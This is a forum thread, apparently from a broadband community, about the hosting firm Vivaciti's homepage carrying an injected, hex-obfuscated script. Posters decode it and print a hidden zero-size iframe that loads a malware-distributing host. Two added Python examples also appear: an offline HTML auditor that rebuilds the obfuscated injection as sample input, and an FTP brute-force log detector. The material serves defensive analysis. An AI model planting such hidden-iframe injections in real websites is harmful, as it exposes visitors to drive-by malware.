Just visited the Vivaciti web site from the link in their sig and got a malware detected warning.
Message reads:
vivaciti.net contains content from shersby.net, a site known to distribute malware. Your computer might catch a virus if you visit this site.
Edited by Kimi (Sat 05-Nov-11 22:11:15)
Sounds as if it already has.
1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 17 Meg Untweaked 19 Meg Tweaked WBC
Chrome currently gives a warning, IE 9 does not.
Chrome currently gives a warning, IE 9 does not.
Yep, I'm using Chrome.
The script is there, at the bottom of the page.
Looks like it was injected. Normally happens with WordPress or other CMSs.
Matt
Sounds as if it already has.
Not me
F.Y.I.:
The domain shersby.net is hosted from IP address 78.129.195.100, ... The server hosting shersby.net is located in a data center in Durham.
Host Details: shersby.net
IP Address: 78.129.195.100
IP Block: 78.129.195.0 - 78.129.195.255
Reverse DNS: host.vivaciti.net
Host: Companyinformation.com Limited, Durham, Durham, GB
Location: Durham, Durham, GB
Page Load Time: 0.641 secs.
Server Type: Apache/2.0.63
I've just been on this site with IE9, Firefox 7 and Chrome 15 and I use AVG 2012 free edition, which is up to date. There are no notes to say of any problems. It might just be either an overactive virus checker or someone is trying to scare people away from the site.
Interesting if one googles the site owner. Unlikely to be a hacker.
My broadband basic info/help site - www.robertos.me.uk
My domains,website and mail hosting - Tsohost. Internet connection - IDNet Home Starter Fibre. Live BQM.
"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
I seem to recall a thread somewhere recently mentioning Kaspersky giving a false positive for this site.
NOD32 doesn't seem to have a problem with it, and Comodo Firewall has not flagged it up either. Both are usually pretty hot at intervening if there is a problem.
I've just been on this site with IE9, Firefox 7 and Chrome 15 and I use AVG 2012 free edition, which is up to date. There are no notes to say of any problems. It might just be either an overactive virus checker or someone is trying to scare people away from the site.
Nothing to do with virus checkers; Google gives the warning through Chrome. Here's the diagnostic page.
Yep google are trying to scare people away from the site.
I did copy and google the hex code at the end of the Home Page, that Matt mentioned. It appears as a large smiley face with "YO!" and a bit of odd stuff at the bottom.
My broadband basic info/help site - www.robertos.me.uk
My domains,website and mail hosting - Tsohost. Internet connection - IDNet Home Starter Fibre. Live BQM.
"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
Funny! I translated it as: <iframe width="0" height="0" style="width: 0%; height: 0%;" frameborder="0" src="http://shersby.net/sTDS/go.php?sid=1"></iframe>write but then I'm not Google.
Looks like some detritus left behind by an HTML editor.
1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 17 Meg Untweaked 19 Meg Tweaked WBC
Kaspersky still does give a warning.
google gives the warning through Chrome.
Where's Google come into it? You're not searching Google for Vivaciti so as to access it, are you? You said you were going directly from a link in their sig.
Up to this evening a Google search for vivaciti.net took you to their homepage, but now it gives you: Warning - visiting this web site may harm your computer! and refuses to take you there.
Whereas, at least since the start of this thread, a Google search for shersby.net tells you on the results page "This site may harm your computer." and blocks you from visiting it.
1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 17 Meg Untweaked 19 Meg Tweaked WBC
Where's Google come into it? You're not searching Google for Vivaciti so as to access it, are you? You said you were going directly from a link in their sig.
Google gives the warning whether you go direct or through a search.
google gives the warning through Chrome.
Where's Google come into it? You're not searching Google for Vivaciti so as to access it, are you? You said you were going directly from a link in their sig.
[cough] Chrome browser is by who?
My broadband basic info/help site - www.robertos.me.uk
My domains,website and mail hosting - Tsohost. Internet connection - IDNet Home Starter Fibre. Live BQM.
"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
Funny! I translated it as: <iframe width="0" height="0" style="width: 0%; height: 0%;" frameborder="0" src="http://shersby.net/sTDS/go.php?sid=1"></iframe>write but then I'm not Google.
Looks like some detritus left behind by an HTML editor.
Start at \x3C\x69\x66\x72\ following the var _0x3f46 and end before the closing quote of that. Copy that long hex sequence into google.uk, and the first result link is
http://downloads.securityfocus.com/vulnerabilities/e...
giving you what I described, occupying more than a full screen. But I just noticed Norton also gave a warning about a malicious script the first time I went to vivaciti after an overnight laptop switch-off (not the second time), so perhaps I'm not seeing the nasty bit in View Source in IE9. See following edited reply to MadMan.
My broadband basic info/help site - www.robertos.me.uk
My domains,website and mail hosting - Tsohost. Internet connection - IDNet Home Starter Fibre. Live BQM.
"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
Edited by RobertoS (Tue 08-Nov-11 08:46:50)
Kaspersky still does give a warning.
I just noticed Norton also gave a warning about a malicious script the first time I went to vivaciti after an overnight laptop switch-off, but not the second time. False alarm. Examination of the Norton Activity log shows it was complaining about Sony Vaio Care trying to access the Norton exe.
My broadband basic info/help site - www.robertos.me.uk
My domains,website and mail hosting - Tsohost. Internet connection - IDNet Home Starter Fibre. Live BQM.
"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
Edited by RobertoS (Tue 08-Nov-11 08:45:05)
Are you using Google DNS?
1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 17 Meg Untweaked 19 Meg Tweaked WBC
That hex script has now been removed from Vivaciti Homepage.
However a Google search for Vivaciti now says "This site may harm your computer." on the results page; it didn't last night.
Sorry, I'm not au fait with Google products!
1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 17 Meg Untweaked 19 Meg Tweaked WBC
Copy that long hex sequence into google.uk, and the first result link is http://downloads.securityfocus.com/vulnerabilities/e... giving you what I described, occupying more than a full screen.
That's as maybe, but it is meaningless and irrelevant! The hex still decodes into what I stated before.
1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 17 Meg Untweaked 19 Meg Tweaked WBC
http://downloads.securityfocus.com/vulnerabilities/e...
FYI: That stuff you found was part of QtWeb Browser Malformed HTML File Remote Denial of Service Vulnerability.
1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 17 Meg Untweaked 19 Meg Tweaked WBC
Bob,
Kaspersky KIS2012 is OK with the vivaciti site now; Norton DNS isn't blocking it either.
However a Google search for Vivaciti now says "This site may harm your computer." on the results page; it didn't last night.
Now removed again and site unblocked by Google. Probably as a result of the recent removal of the hex script from the homepage.
1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 17 Meg Untweaked 19 Meg Tweaked WBC
Post deleted by Capvermell
I am the registrant of this domain on the Vivaciti website ....
What a very strange and puzzling post.
1) "This domain"? What domain?
2) You seem to be reporting a problem with the vivaciti website itself. Not the content of your web space.
3) So you got to your domain administration page, with this report. Have you looked via that page at what is in your web space? You don't say you have, so what makes you say your web space is infected with anything?
Oh - a thought just occurred to me. What happens if, when you have this report showing, you press F5?
My broadband basic info/help site - www.robertos.me.uk | Domains,website and mail hosting - Tsohost.
Connection - Plusnet UnLim Fibre (FTTC). Sync ~ 54.0/14.9Mbps @ 600m. - BQM
"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allergy information: This post was manufactured in an environment where nuts are present. It may include traces of understatement, litotes and humour.
Post deleted by Capvermell
Edited by deleted (Wed 23-Jan-13 12:55:18)
1) "This domain"? What domain?
The OP mentions a domain in addition to vivaciti.net - a domain which appears to be registered to a private individual and hosted on the vivaciti web space.
Edited by deleted (Wed 23-Jan-13 13:18:32)
There are many ways an attacker could have gained access to your control panel. Some seem to spend all day probing my servers for exactly this sort of thing (in my case they won't get very far as I don't administer them that way... but they still keep trying). And I'm sure they'll target other servers too, not just mine.
How secure is your admin password for that site?
Did you receive a password in email - and did you change it after receiving it?
Or of course it could just be that the security of the site isn't as good as it could be, and there's nothing you can do to change that.
This thread is all about some malware being reported on access to Vivaciti's home page, not from your shersby.net domain or webspace.
Why don't you just try and help me resolve the issue rather than talking down to me officiously and patronisingly
What issue? Our issue was resolved over a year ago.
Also all of you in this thread began talking about my registered web domain without my permission.
Eh? We don't need your permission to discuss a name that appears in the public domain.
Methinks you are getting uppity about something that is done and dusted. You have come late to the party.
1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 19 Meg WBC
Just make sure you don't look at shersby.net...
Looks like nobody has done anything to remove the content from there.
What does it do? I accidentally got to the http:// sh... version just now. That gave a single page with an on-off button and some odd text.
Ah - I see my IS blocked it: Medium, Unauthorized access blocked (Access Process Data), Blocked, No Action Required.
Not tried the www. version.
My broadband basic info/help site - www.robertos.me.uk | Domains,website and mail hosting - Tsohost.
Connection - Plusnet UnLim Fibre (FTTC). Sync ~ 54.0/14.9Mbps @ 600m. - BQM
"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allergy information: This post was manufactured in an environment where nuts are present. It may include traces of understatement, litotes and humour.
I've only got the HTML using wget, because all that does is save it to a local file and does not execute any scripts.
Opening the result with a text editor, there is a lot of included javascript from another site, which itself appears to contain content which was not intended by the site's owner...
I have seen enough, and I won't be opening these pages in a browser.
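Doing by script what earlier posts did by hand: the following is an added example (my own, not code from the thread, from Vivaciti or from any tool named here) that takes a page saved with wget, decodes any \xNN-escaped JavaScript string literals of the kind quoted earlier (var _0x3f46 = "\x3C\x69\x66\x72..."), and lists off-site script includes and zero-size iframes, so the page is triaged without a browser ever executing it. The sample page, the cdn.example.invalid host and the function names audit_html and decode_hex_escapes are constructed for the example; the iframe tag it re-encodes is the one decoded earlier in the thread.

```python
"""Offline triage of a saved HTML page: decode hex-escaped JS strings and list
off-site resources and hidden iframes without executing anything."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# JavaScript \xNN escape, e.g. \x3C -> "<"
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")
# A quoted JS string literal made of plain characters and \xNN escapes only
# (other escape forms such as \n are deliberately not handled here).
ESCAPED_LITERAL = re.compile(r"""(["'])((?:\\x[0-9A-Fa-f]{2}|[^"'\\])+?)\1""")


def decode_hex_escapes(text):
    """Turn JavaScript \\xNN escapes back into the characters they encode."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


class _Collector(HTMLParser):
    """Collect <script src>, inline script bodies and <iframe> attributes."""

    def __init__(self):
        super().__init__()
        self.scripts = []     # src attribute of every <script src=...>
        self.inline_js = []   # text of every inline <script>
        self.iframes = []     # attribute dict of every <iframe>
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self.scripts.append(a["src"])
        elif tag == "iframe":
            self.iframes.append(a)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline_js.append(data)


def _is_zero_size(attrs):
    """True for iframes sized to be invisible (width/height 0 or 0%)."""
    style = attrs.get("style", "").replace(" ", "")
    return (attrs.get("width") == "0" or attrs.get("height") == "0"
            or "width:0" in style or "height:0" in style)


def audit_html(html, site_host):
    """Return off-site scripts, hidden iframes and off-site iframes found in a
    saved page. Hex-escaped literals in inline scripts are decoded and the
    markup they would have written into the page is parsed as well."""
    c = _Collector()
    c.feed(html)
    for _, literal in ESCAPED_LITERAL.findall("".join(c.inline_js)):
        if "\\x" in literal:
            c.feed(decode_hex_escapes(literal))
    c.close()

    def host(url):
        # Relative URLs belong to the site itself.
        return (urlparse(url).hostname or site_host).lower()

    return {
        "external_scripts": sorted({s for s in c.scripts if host(s) != site_host}),
        "hidden_iframes": [a.get("src", "") for a in c.iframes if _is_zero_size(a)],
        "offsite_iframes": sorted({a["src"] for a in c.iframes
                                   if a.get("src") and host(a["src"]) != site_host}),
    }


# The iframe tag decoded earlier in the thread, re-encoded here as \xNN escapes
# to build a constructed sample page (cdn.example.invalid is made up).
IFRAME_TAG = ('<iframe width="0" height="0" style="width: 0%; height: 0%;" '
              'frameborder="0" src="http://shersby.net/sTDS/go.php?sid=1"></iframe>')
OBFUSCATED = "".join("\\x%02X" % ord(ch) for ch in IFRAME_TAG)
SAMPLE_PAGE = f"""<html><body>
<h1>Welcome</h1>
<script src="/js/site.js"></script>
<script src="http://cdn.example.invalid/lib.js"></script>
<script>var _0x3f46 = "{OBFUSCATED}"; document.write(_0x3f46);</script>
</body></html>"""

if __name__ == "__main__":
    for key, value in audit_html(SAMPLE_PAGE, "vivaciti.net").items():
        print(key, value)
```

To use it on a real capture, read the file wget saved and call audit_html(text, "your-site-host"); a zero-size iframe or a script loaded from a host you do not recognise is the thing to investigate, and nothing in the page is rendered or run while you do.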
There are many ways an attacker could have gained access to your control panel.
Aided by having his full name and address from the WHOIS perhaps.
My broadband basic info/help site - www.robertos.me.uk | Domains,website and mail hosting - Tsohost.
Connection - Plusnet UnLim Fibre (FTTC). Sync ~ 54.0/14.9Mbps @ 600m. - BQM
"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allergy information: This post was manufactured in an environment where nuts are present. It may include traces of understatement, litotes and humour.
Quite possibly, depending on one's choice of passwords...
The site has been defaced by an Indonesian script kiddie.
I've just had a look at the source, which contains "Copyright 2012". If that's true, this occurred long after this thread died in its original incarnation.
I'm amazed that vivaciti's anti-hacking setup isn't more robust than the Pentagon's. It really is too bad.
My broadband basic info/help site - www.robertos.me.uk | Domains,website and mail hosting - Tsohost.
Connection - Plusnet UnLim Fibre (FTTC). Sync ~ 54.0/14.9Mbps @ 600m. - BQM
"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allergy information: This post was manufactured in an environment where nuts are present. It may include traces of understatement, litotes and humour.
... and meant to switch all my email to it but then life and other matters got in the way.
However it appears you do use it for some email, so your domain name could get anywhere, providing a target for hackers.
Weird though that the source has that 2012 in it, when the original problem was cleared in 2011. I wonder if there is any tenuous connection with a previous owner of the domain (not that the previous owner need be anything to do with this), and somehow your email address is being spoofed as well?
My broadband basic info/help site - www.robertos.me.uk | Domains,website and mail hosting - Tsohost.
Connection - Plusnet UnLim Fibre (FTTC). Sync ~ 54.0/14.9Mbps @ 600m. - BQM
"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allergy information: This post was manufactured in an environment where nuts are present. It may include traces of understatement, litotes and humour.
You are right... "Last-Modified: Sun, 02 Sep 2012 17:24:32 GMT"
As for the anti-hacking setup, surely the Pentagon doesn't have important enough secrets to worry about anything.
I doubt if it has any secrets by now.
My broadband basic info/help site - www.robertos.me.uk | Domains,website and mail hosting - Tsohost.
Connection - Plusnet UnLim Fibre (FTTC). Sync ~ 54.0/14.9Mbps @ 600m. - BQM
"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allergy information: This post was manufactured in an environment where nuts are present. It may include traces of understatement, litotes and humour.
Post deleted by MrSaffron
Post removed as it added nothing to the thread other than perhaps fuelling fights.
The author of the above post is a thinkbroadband staff member. It may not constitute an official statement on behalf of thinkbroadband.
From my experience most of these injections occur via poor FTP passwords and successful brute force attempts, although obviously it isn't the only way in.
BT Infinity 2 Since Dec 2012 - Estimate 65.9/20 - Attainable peak 110/36 - Current Sync 71/20
Quite.
So far, in his pique, he appears to have ignored this post of mine which is supposed to be helpful in that there is a fair chance that the shersby email address he has used is also the login username for his account.
A point I would have made to him, given a sensible reply. At least it is here now, so maybe it will help him.
My broadband basic info/help site - www.robertos.me.uk | Domains,website and mail hosting - Tsohost.
Connection - Plusnet UnLim Fibre (FTTC). Sync ~ 54.0/14.9Mbps @ 600m. - BQM
"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allergy information: This post was manufactured in an environment where nuts are present. It may include traces of understatement, litotes and humour.
Speaking of pique, go and reread his two posts.
ROFL
My broadband basic info/help site - www.robertos.me.uk | Domains,website and mail hosting - Tsohost.
Connection - Plusnet UnLim Fibre (FTTC). Sync ~ 54.0/14.9Mbps @ 600m. - BQM
"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allergy information: This post was manufactured in an environment where nuts are present. It may include traces of understatement, litotes and humour.
There was an issue some time ago (as you can see from the date of the original thread that has been exhumed).
The issue was around weak passwords being used to brute force a number of sites.
There was an issue some time ago (as you can see from the date of the original thread that has been exhumed).
The issue was around weak passwords being used to brute force a number of sites.
Can I be so bold as to ask why you didn't mention the reason behind the malware at the time of the original thread?
Maybe in the year 1999. Things have moved on since then.
Not in my experience; I still see lots of FTP break-ins occur on many servers due to weak passwords, and indeed Vivaciti seem to have even confirmed it now as a weak password issue.
BT Infinity 2 Since Dec 2012 - Estimate 65.9/20 - Attainable peak 110/36 - Current Sync 71/20
Brute force is just one of many methods used by attackers, although it's pretty inefficient. These days it's far easier to exploit a vulnerability in a web script or server-side service, or use SQL injection to extract password hashes and run them through a table or two.
I am aware, but just posted my experience of where most exploitations have come from on servers I have access to.
Web script vulns and the like can be mitigated by security filters.
BT Infinity 2 Since Dec 2012 - Estimate 65.9/20 - Attainable peak 110/36 - Current Sync 71/20
If someone is smart enough to harden a server, they'll probably go all the way and disable FTP altogether or at least lock it down.
?
If you disable FTP then hosting customer websites surely becomes a little difficult? Any normal way of allowing customers to FTP would still be hackable.
My broadband basic info/help site - www.robertos.me.uk | Domains,website and mail hosting - Tsohost.
Connection - Plusnet UnLim Fibre (FTTC). Sync ~ 54.0/14.9Mbps @ 600m. - BQM
"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allergy information: This post was manufactured in an environment where nuts are present. It may include traces of understatement, litotes and humour.
SFTP over SSH with public key support is superior.
Plenty of ftpds include anti-brute-force protection. It's usually just a case of enabling it in the config.
/me showing ignorance, again.
My broadband basic info/help site - www.robertos.me.uk | Domains,website and mail hosting - Tsohost.
Connection - Plusnet UnLim Fibre (FTTC). Sync ~ 54.0/14.9Mbps @ 600m. - BQM
"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allergy information: This post was manufactured in an environment where nuts are present. It may include traces of understatement, litotes and humour.
Edited by RobertoS (Sat 26-Jan-13 12:54:26)
If someone is smart enough to harden a server, they'll probably go all the way and disable FTP altogether or at least lock it down.
On shared hosting where the end user expects FTP, sales needs come first.
Where I have the power to, though, I now enforce strong passwords and apply rate limiting on login attempts.
BT Infinity 2 Since Dec 2012 - Estimate 65.9/20 - Attainable peak 110/36 - Current Sync 71/20
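Rate limiting login attempts, as the posts above describe, depends on first spotting the pattern in the logs. The following is an added example (my own, not from the thread or from any FTP daemon's built-in protection) that reads constructed log lines written in the style of a vsftpd log, flags any client that racks up more than a handful of failures inside a short window, and records whether that client subsequently logged in successfully, which is the case to treat as a likely compromised account rather than mere noise. The log lines, addresses, usernames and thresholds are all made up for the example; the regular expression assumes the "FAIL LOGIN: Client" / "OK LOGIN: Client" wording.

```python
"""Flag FTP clients that fail repeatedly within a short window, and note when
such a client then succeeds (a guessed password rather than a typo)."""
import re
from collections import Counter, defaultdict, deque
from datetime import datetime

# Constructed log lines modelled on a vsftpd log; not a real capture.
SAMPLE_LOG = """\
Sat Jan 26 12:00:01 2013 [pid 2101] [alice] OK LOGIN: Client "203.0.113.5"
Sat Jan 26 12:00:05 2013 [pid 2102] [admin] FAIL LOGIN: Client "198.51.100.7"
Sat Jan 26 12:00:06 2013 [pid 2103] [admin] FAIL LOGIN: Client "198.51.100.7"
Sat Jan 26 12:00:07 2013 [pid 2104] [admin] FAIL LOGIN: Client "198.51.100.7"
Sat Jan 26 12:00:08 2013 [pid 2105] [admin] FAIL LOGIN: Client "198.51.100.7"
Sat Jan 26 12:00:09 2013 [pid 2106] [admin] FAIL LOGIN: Client "198.51.100.7"
Sat Jan 26 12:00:10 2013 [pid 2107] [admin] FAIL LOGIN: Client "198.51.100.7"
Sat Jan 26 12:00:12 2013 [pid 2108] [admin] OK LOGIN: Client "198.51.100.7"
Sat Jan 26 12:30:00 2013 [pid 2109] [bob] FAIL LOGIN: Client "203.0.113.9"
Sat Jan 26 12:45:00 2013 [pid 2110] [bob] FAIL LOGIN: Client "203.0.113.9"
"""

# Assumed line layout: timestamp, [pid N], [user], OK|FAIL LOGIN: Client "ip"
LINE = re.compile(r'^(\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
                  r'\[(\S*)\] (OK|FAIL) LOGIN: Client "([\d.]+)"')


def parse_line(line):
    """Return (timestamp, user, succeeded, client_ip) or None for other lines."""
    m = LINE.match(line)
    if not m:
        return None
    ts, user, result, ip = m.groups()
    return datetime.strptime(ts, "%a %b %d %H:%M:%S %Y"), user, result == "OK", ip


def detect_bruteforce(lines, max_failures=5, window_seconds=60):
    """Return {client_ip: {"failures": n, "success_after_flag": bool, "user": u}}
    for clients whose failures inside a sliding window reach max_failures.
    Two failures a quarter of an hour apart never accumulate, so an ordinary
    user mistyping a password is not flagged."""
    recent = defaultdict(deque)   # client_ip -> timestamps of failures in window
    total_failures = Counter()    # client_ip -> failures seen overall
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, user, ok, ip = parsed
        window = recent[ip]
        while window and (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if ok:
            # A success after the client was flagged is the dangerous case.
            if ip in flagged:
                flagged[ip]["success_after_flag"] = True
                flagged[ip]["user"] = user
            continue
        window.append(ts)
        total_failures[ip] += 1
        if len(window) >= max_failures or ip in flagged:
            entry = flagged.setdefault(ip, {"success_after_flag": False, "user": user})
            entry["failures"] = total_failures[ip]
    return flagged


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        verdict = "LOGGED IN AFTER FAILURES" if info["success_after_flag"] else "blocked so far"
        print(f"{ip}: {info['failures']} failures as {info['user']!r} ({verdict})")
```

The thresholds are the knobs a daemon's own anti-brute-force option exposes in a different form; the point of running the check over the log as well is the "success_after_flag" case, which a simple rate limiter never reports and which is the signal that a password needs resetting.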
I agree with both of these things, although on the former it's a case of the end user using it or being willing to use it.
BT Infinity 2 Since Dec 2012 - Estimate 65.9/20 - Attainable peak 110/36 - Current Sync 71/20
Yes you can.
Our customers were informed of the issues and the reasons directly, had you been one of our customers, you would have received the information.
Yes you can.
Our customers were informed of the issues and the reasons directly, had you been one of our customers, you would have received the information.
I was a potential customer (well, my son was, to be honest); we went on to your web site to look into purchasing hosting from you, but your lack of information and the seemingly head-in-the-sand approach on the issue put doubts in his mind and so he ended up going with Uno.
The malware warning stopped me going any further on your web site, so I asked the question here but you chose to ignore it.